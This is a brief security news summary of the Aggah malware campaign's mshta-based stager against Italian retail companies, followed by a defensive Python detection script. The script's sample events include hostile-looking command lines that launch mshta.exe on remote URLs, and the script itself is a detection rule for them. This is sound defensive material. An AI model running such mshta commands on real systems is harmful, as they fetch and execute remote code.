Experts from Yoroi-Cybaze ZLab have spotted new attack attempts directed at some Italian companies operating in the Retail sector, linked to the Aggah campaign. The first part of this initial implant aims to kill the Word and Excel processes. The malicious code within the PPA abuses the Microsoft mshta utility to download a web page from the BlogSpot platform. It uses the same trick from the past: hiding the JavaScript stager code inside the web page, an ad hoc code snippet which will be interpreted and executed only by the MSHTA engine.
Source: https://securityaffairs.co/wordpress/96887/malware/aggah-botnet.html
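
One way a defender could hunt for the mshta stage described above, as an added example (not code from the Yoroi-Cybaze report or the source article): it scans process-creation events for `mshta.exe` launched with a remote URL and raises severity when the parent is an Office application. The event field names, the sample events, the Office-parent heuristic and the severity scheme are all assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation events (image, parent image, command line).
# Field layout and every value are illustrative, not taken from the report.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Microsoft Office\Office16\POWERPNT.EXE",
     "cmdline": "mshta.exe https://example-stager.blogspot.com/p/page.html"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Tools\inventory.hta"'},
    {"image": r"C:\Windows\SysWOW64\mshta.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'MSHTA  "http://intranet.example.local/app.hta"'},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe https://example.com/readme.txt"},
]

OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe"}  # assumed parent set
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def basename(path):
    # Windows paths: split on backslash regardless of the analysis host's OS.
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return a finding for mshta.exe started with a remote URL, else None."""
    if basename(event["image"]) != "mshta.exe":
        return None
    match = URL_RE.search(event["cmdline"])
    if not match:
        return None  # local .hta file: out of scope for this check
    host = (urlparse(match.group(0)).hostname or "").lower()
    office = basename(event["parent"]) in OFFICE_PARENTS
    blog = host == "blogspot.com" or host.endswith(".blogspot.com")
    severity = "high" if office else ("medium" if blog else "low")
    return {"host": host, "office_parent": office,
            "blog_host": blog, "severity": severity}

def scan(events):
    return [finding for finding in map(triage, events) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```
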

